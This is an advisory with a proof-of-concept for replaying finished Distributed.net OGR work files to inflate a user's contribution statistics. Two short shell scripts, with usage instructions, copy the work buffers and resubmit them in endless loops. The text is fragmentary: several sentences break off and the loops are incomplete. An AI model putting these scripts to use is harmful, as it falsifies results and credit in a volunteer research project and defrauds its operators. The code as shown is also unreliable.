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Sending exact replicas of Distributed.net's worked OGR project files could increase individual's stats.

Vulnerable: All Dnet clients when working on OGR project

Distributed.net was the Internet's first general-purpose distributed computing 
Founded in 1997, the network has grown to include thousands of users around the 
world donating the power of their home computers to academic research and 
public-interest projects.
There is a possibilty to send exact replicas of worked OGR (Optimal Golomb 
Ruler) project files several times. Therefore, an individual could gain fake 

Bug Discovered by UHAGr team on 07-Dec-2002 - www.UHAGr.org

--------- START OF DNETC-OWNAGE.sh ------------
# Proof-of-concept script for
# "Sending exact replicas of Distributed.net's worked OGR project files
#  could increase individual's stats" 
# Bug Discovered by UHAGr team on 07-Dec-2002 www.UHAGr.org
# Published 14-Feb-2006 some things take time u know... :)
#Vulnerable: All Dnet clients when working on OGR project
#There is a possibilty to send exact replicas of worked OGR (Optimal Golomb 
#project files several times. Therefore, an individual could increase his stats 
with fake worked files
# When your OGR work is finished
# copy the script into the dnetc directory
# sh dnetc-ownage.sh &
# cd NEW/
# copy the mpe.sh script in the NEW directory and run it
# and that's all
# when you're bored, just kill the appropriate pid
# Distributed.net server isn't checking the result files...
# WHY? Shame on u...
mkdir NEW
cp * NEW/
while spoilt=true;do
cp buff-* NEW/
---------------- END --------------------
------------ START OF MPE.sh -----------
while spoilt=true;do
./dnetc -flush
sleep 1
---------------- END --------------------